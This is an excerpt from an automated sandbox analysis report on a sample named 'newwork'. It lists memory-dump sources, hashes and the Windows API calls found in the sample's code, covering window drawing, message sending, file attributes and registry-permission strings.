                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                • API String ID: 828529508-2866557904
                                                                                • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                APIs
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                • API String ID: 2573145106-3235461205
                                                                                • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                • API String ID: 3478007392-2498399450
                                                                                • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                • String ID: AllowSetForegroundWindow$user32.dll
                                                                                • API String ID: 1782028327-3855017861
                                                                                • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                APIs
                                                                                • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                • SaveDC.GDI32(?), ref: 00416C83
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 3808407030-0
                                                                                • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                • GetDC.USER32(00000000), ref: 0041BC12
                                                                                • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                • String ID:
                                                                                • API String ID: 1095203571-0
                                                                                • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                APIs
                                                                                  • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                Strings
                                                                                • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                • API String ID: 1452528299-4018462623
                                                                                • Opcode ID: 84f5240d3e2a5678dc298f5d2d5fcd3d219003d8bdc0b17d0e0e8e1e879b006c
                                                                                • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                • Opcode Fuzzy Hash: 84f5240d3e2a5678dc298f5d2d5fcd3d219003d8bdc0b17d0e0e8e1e879b006c
                                                                                • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                APIs
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$RealizeSelect$Release
                                                                                • String ID:
                                                                                • API String ID: 2261976640-0
                                                                                • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                APIs
                                                                                  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                • String ID: vLB
                                                                                • API String ID: 1477829881-1797516613
                                                                                • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                APIs
                                                                                • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Enum$NameOpenResourceUniversal
                                                                                • String ID: Z
                                                                                • API String ID: 3604996873-1505515367
                                                                                • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                APIs
                                                                                • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: DrawText$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 182455014-2867612384
                                                                                • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                • String ID: ...\
                                                                                • API String ID: 3133960002-983595016
                                                                                • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                • RegisterClassA.USER32(?), ref: 004164CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Class$InfoRegisterUnregister
                                                                                • String ID: @
                                                                                • API String ID: 3749476976-2766056989
                                                                                • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
